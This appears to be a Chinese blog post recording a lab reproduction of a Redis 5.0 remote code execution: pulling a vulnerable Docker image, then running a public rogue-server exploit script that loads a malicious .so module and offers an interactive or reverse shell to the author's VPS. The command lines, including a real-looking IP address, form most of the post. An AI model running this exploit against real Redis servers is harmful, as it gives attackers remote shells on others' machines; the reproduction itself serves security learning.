0x00 前言
最近期末考試,博客好久沒有更新了,這段時間爆了三四個洞,趁着還沒去實習,抓緊復現一下,這次復現的是Redis的RCE,復現過程中也遇到很多問題,記錄下來和大家分享一下
0x01 拉取鏡像
docker確實是個好東西,有了它復現節省不少時間,首先拉取一個5.0鏡像
docker search redis5.0 //查找鏡像
docker pull damonevking/redis5.0 //拉取下圖第三個鏡像
0x02 運行環境
運行容器
docker run -p 6379:6379 -d damonevking/redis5.0 redis-server //映射端口並運行容器
訪問:你的ip:6379,如下圖則搭建成功
0x03 漏洞利用
git clone https://github.com/Ridter/redis-rce.git //下載漏洞利用腳本
注意,這里少一個.so的文件,到https://github.com/n0b0dyCN/redis-rogue-server下載並放到和redis-rce.py同一目錄下
python3 redis-rce.py -r 136.244.70.243(目標ip) -L 136.244.70.243(自己的vps) -f exp.so //ip就不打碼了,師傅們不要搞我
在此處:i為交互式shell,r為反彈shell,根據自己的需要選擇就可以了
參考鏈接:
https://github.com/Ridter/redis-rce
https://github.com/n0b0dyCN/redis-rogue-server
https://www.cnblogs.com/mrhonest/p/11162735.html